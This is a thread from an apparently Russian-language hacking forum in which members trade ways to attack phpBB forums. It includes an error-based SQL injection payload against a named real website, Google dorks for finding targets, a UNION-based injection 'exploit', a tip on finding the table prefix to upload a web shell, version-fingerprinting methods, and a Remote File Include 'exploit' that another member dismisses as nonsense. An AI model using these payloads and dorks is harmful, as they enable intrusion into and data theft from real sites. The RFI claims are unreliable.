Войти или зарегистрироваться
Выберите удобный способ — аккаунт создастся автоматически.
Или войдите по логину и паролю

26.03.2010, 22:29
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Target: phpbb2*
Dork: inurl:"kb.php?mode=cat"
Example:
Код:
http://aquaticreefsystems.com/forum/kb.php?mode=cat&cat=13
SQL injection (without union+select):
Код:
http://aquaticreefsystems.com/forum/kb.php?mode=cat&cat=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+phpbb_kb_categories+group+by+2+limit+1)a)
Префикс таблицы kb_categories может отличаться, но его видно в ошибке
PS: актуально для 4.1<=MySQL=>5
|
|
|

22.06.2010, 01:11
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами:
9898501
Репутация:
257
|
|
Версия - 2.x
Может я не увидел, и эта информация где-то должна отображатся, но всё же отпишу. Если у вас есть админка, и вам нужно узнать префикс для заливки шелла, делаем несколько банальных действий.
Общие настройки - Резервная копия БД - Копировать только структуру(пташка) - начать копирование, файл скачивается и собственно в нём уже и смотрим префикс.
Такая вот маленькая полезность. Может ещё кому пригодится.
|
|
|

16.10.2010, 17:25
|
|
Познающий
Регистрация: 24.03.2009
Сообщений: 54
С нами:
9017758
Репутация:
13
|
|
===========================================
PHPBB 3.0.* CMS SQL Injection Vulnerability
===========================================
# Exploit Title: PHPBB 3.0.* CMS SQLinjection
# Date: 2010-08-27
# Team: eX.ploit ( Abjects #ex.ploit )
# Software Link: http://www.phpbb.com/
# Version: PHPBB3.0.* CMS only (does not work on FORUM only)
# Tested on: Linux
# Usage: SQLinjection
# Gain detailed database information
Google dork:[inurl:mypage.php?id= & "Powered by phpBB"]
# Tested on:linux/php
Url| http://www.website.com/news_view.php?id=1
Vuln: http://www.website.com/news_view.php?id=1+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4
# Inj3ct0r.com [2010-08-27]
|
|
|

03.11.2010, 04:05
|
|
Новичок
Регистрация: 16.08.2005
Сообщений: 11
С нами:
10913377
Репутация:
0
|
|
так же версию продукта можно определить
forum/styles/prosilver/style.cfg
|
|
|

24.12.2010, 18:57
|
|
Новичок
Регистрация: 13.12.2010
Сообщений: 2
С нами:
8112566
Репутация:
0
|
|
Сообщение от marD
так же версию продукта можно определить
forum/styles/prosilver/style.cfg
интересно.
Да действительно работает даже на версии 3.0.8
м.б. есть еще что то что можно проверить?
выдает:
Код HTML:
#
# phpBB Style Configuration File
#
# @package phpBB3
# @copyright (c) 2005 phpBB Group
# @license http://opensource.org/licenses/gpl-license.php GNU Public License
#
#
# At the left is the name, please do not change this
# At the right the value is entered
# For on/off options the valid values are on, off, 1, 0, true and false
#
# Values get trimmed, if you want to add a space in front or at the end of
# the value, then enclose the value with single or double quotes.
# Single and double quotes do not need to be escaped.
#
#
# General Information about this style
name = prosilver
copyright = © phpBB Group, 2007
version = 3.0.8
не удасться ли это использовать как уязвимость?
более никаких ответов узнать не удалось хотя перелопатил кучу инфы на все запросы был ответ - " Forbidden
You don't have permission to access /styles/ on this server. "
не появиось ли чего новенького для 3.0.8 ?
|
|
|

02.01.2011, 21:01
|
|
Новичок
Регистрация: 18.12.2010
Сообщений: 4
С нами:
8105366
Репутация:
0
|
|
Сообщение от juffin
м.б. есть еще что то что можно проверить?
Можно проверять по второму, идущему в стандарте, стилю: forum/styles/subsilver2/style.cfg
Однако оба этих файла не могут дать твёрдой уверенности, т.к. не всегда обновляются админами при смене версии движка.
Определить версию 3.0.8 можно по косвенным признакам:
1) Наличие файла forum/web.config (*nix отдаст как текст)
2) Ошибка 403 при запросе файлов из папки forum/includes/ (например, forum/includes/functions.php), в более старых версиях открывается чистая страница (ибо exit).
Сообщение от juffin
не удасться ли это использовать как уязвимость?
Это не уязвимость.
Сообщение от juffin
более никаких ответов узнать не удалось хотя перелопатил кучу инфы на все запросы был ответ - " Forbidden
You don't have permission to access /styles/ on this server. "
не появиось ли чего новенького для 3.0.8 ?
Это самодеятельность админов, в стандартной поставке файлы из папки forum/styles/ не защищены ничем
|
|
|

16.01.2011, 02:55
|
|
Новичок
Регистрация: 13.12.2010
Сообщений: 2
С нами:
8112566
Репутация:
0
|
|
интересно. версия точно 3.0.8 все описанные выше косвенные признаки присутствуют,includes/ закрыты видимо .htaccess -ом и т.п.
довольно интересно, нет ли каких либо советов? какие то недо конца или плохо закрытые ветки ? м.б. инъекции уже появились?
|
|
|

18.01.2011, 10:03
|
|
Познающий
Регистрация: 22.01.2007
Сообщений: 32
С нами:
10158236
Репутация:
0
|
|
phpBB 3.0.7
Код:
######################################################################
#
# PHPBB Version 3.0.7 Remote File Include !
#
# Author : D.0.M TEAM
#
# Founded By : S3Ri0uS !
#
# We Are : Inj3ct0r.com Exploit and Vulnerability Database.
#
# Public Site : WwW.Anti-Secure.CoM !
#
# Security Site : WwW.D0M-Security.CoM !
#
# Contact 1 : S3Ri0uS.Blackhat@Gmail.CoM !
#
# Contact 2 : S3Ri0uS_Blackhat@Yahoo.CoM !
#
# SpT : All Iranian Hackers !
#
######################################################################
#
# Dork :
#
# inurl:"powered by PHPBB Version 3.0.7"
#
# Exploit :
#
# http://www.site.com/path/common.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/cron.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/faq.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/feed.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/index.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/mcp.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/memberlist.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/posting.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/report.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/search.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/style.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/ucp.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/viewforum.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/adm/index.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/adm/swatch.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/download/file.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/auth.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/functions.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/functions_content.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/session.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/template.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/acm/acm_file.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/acp/acp_attachments.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/utf/utf_tools.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/ucp/ucp_register.php?phpbb_root_path=[shell code]
#
# http://www.site.com/path/includes/ucp/ucp_pm_viewmessage.php?phpbb_root_path=[shell code]
#
######################################################################
|
|
|

29.01.2011, 19:59
|
|
Новичок
Регистрация: 18.12.2010
Сообщений: 4
С нами:
8105366
Репутация:
0
|
|
SSSetuPPP, это же бред.
Файл common.php закрыт через .htaccess, во всех файлах из папки /includes/ при прямом запросе срабатывает exit, да и переопределние переменной phpbb_root_path ничего не сможет дать. Хотя указанный выше "эксплоит" ничего и не способен переопределить.
|
|
|

31.01.2011, 09:09
|
|
Познающий
Регистрация: 22.01.2007
Сообщений: 32
С нами:
10158236
Репутация:
0
|
|
phpBB Version 3.0.7 Remote File Include Vulnerability
_http://www.inj3ct0r.com/exploits/12604
_http://www.allinfosec.com/2010/06/09/phpbb-version-3-0-7-remote-file-include-vulnerability/
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|